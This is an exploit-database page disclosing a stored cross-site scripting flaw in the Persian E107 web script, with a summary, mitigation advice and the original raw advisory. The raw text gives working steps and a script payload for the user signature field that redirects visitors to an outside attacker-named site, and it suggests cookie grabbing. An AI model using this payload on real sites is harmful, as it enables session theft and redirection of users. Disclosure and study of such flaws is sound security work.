header-logo
Suggest Exploit
vendor:
Persian E107
by:
indoushka
N/A
CVSS
N/A
XSS
Unknown
CWE
Product Name: Persian E107
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested: Windows SP2 Français
Unknown

Persian E107 XSS Vulnerability

The Persian E107 script is vulnerable to XSS. An attacker can exploit this vulnerability by registering on the website and then going to the usersettings.php page. They can then edit their signature and insert malicious code, such as a script that redirects users to a different website. This can be used to steal cookies or perform other malicious actions.

Mitigation:

To mitigate this vulnerability, website administrators should implement input validation and sanitization techniques to prevent the execution of malicious code. They should also regularly update the script to the latest version, as the vendor may have released a patch to fix this issue.
Source

Exploit-DB raw data:

========================================================================================                  
| # Title    : Persian E107 XSS Vulnerability            
| # Author   : indoushka                                                               
| # email    : indoushka@dgsn.dz                                                   
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)                                                                              |
| # Web Site : www.iqs3cur1ty.com/vb                                                                                                                                   
| # Script   : Powered By Persian E107 BY Iranscripts.Com | Sponsor : MehrHost.Com     
| # Tested on: windows SP2 Français V.(Pnx2 2.0)       
| # Bug      : XSS                                                                     
======================      Exploit By indoushka       =================================
 # Exploit  : 
 
 1- After register go to http://127.0.0.1/Persian/usersettings.php 
 
 2- Edit your Signature Put this code or other's :
 
 ">"">>>><script>location="http://www.arab-blackhat.co.cc"</script>"""">
 
 use coockie Graber or what you wont
 
Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ====================
Greetz : inj3ct0r Team 
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R * www.alkrsan.net * MR.SoOoFe * ThE g0bL!N
------------------------------------------------------------------------------------------------------------------------

Navigation

Suggest Exploit

Services By CQR